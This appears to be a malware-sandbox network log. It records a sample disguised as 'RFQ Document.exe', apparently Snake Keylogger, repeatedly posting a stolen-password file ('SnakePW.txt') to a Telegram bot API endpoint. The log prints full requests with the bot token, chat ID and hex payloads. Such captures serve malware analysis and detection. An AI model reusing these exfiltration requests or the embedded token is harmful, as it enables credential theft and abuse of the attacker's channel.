                                            2021-09-28 05:58:24 UTC33OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 34 35 32 62 31 62 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c452b1bfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:24 UTC34INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:24 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:24 UTC34INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12601,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808704,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            210192.168.2.450031149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:17 UTC334OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e3d92132
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:17 UTC334OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 33 64 39 32 31 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e3d92132Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:17 UTC335INHTTP/1.1 429 Too Many Requests
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:17 GMT
                                            Content-Type: application/json
                                            Content-Length: 109
                                            Connection: close
                                            Retry-After: 9
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:17 UTC335INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d
                                            Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            211192.168.2.450032149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:18 UTC335OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e3f0fa00
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:18 UTC336OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 33 66 30 66 61 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e3f0fa00Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:26 UTC336INHTTP/1.1 429 Too Many Requests
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:26 GMT
                                            Content-Type: application/json
                                            Content-Length: 109
                                            Connection: close
                                            Retry-After: 3
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:26 UTC336INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 33 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 33 7d 7d
                                            Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 3","parameters":{"retry_after":3}}


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            212192.168.2.450033149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:26 UTC336OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e8ea1fc9
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:26 UTC337OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 38 65 61 31 66 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e8ea1fc9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:29 UTC337INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:29 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:29 UTC338INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 36 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12797,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808769,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            213192.168.2.450034149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:29 UTC338OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255eac493ff
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:29 UTC338OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 61 63 34 39 33 66 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255eac493ffContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:29 UTC339INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:29 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:29 UTC339INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 36 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12799,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808769,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            214192.168.2.450035149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:29 UTC340OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255eae12f37
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:29 UTC340OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 61 65 31 32 66 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255eae12f37Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:29 UTC340INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:29 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:29 UTC341INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 36 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12800,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808769,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            215192.168.2.450036149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:29 UTC341OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255eaf905e4
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:29 UTC342OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 61 66 39 30 35 65 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255eaf905e4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:29 UTC342INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:29 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:29 UTC342INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 36 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12801,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808769,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            216192.168.2.450037149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:29 UTC343OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255eb180345
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:29 UTC343OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 62 31 38 30 33 34 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255eb180345Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:29 UTC344INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:29 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
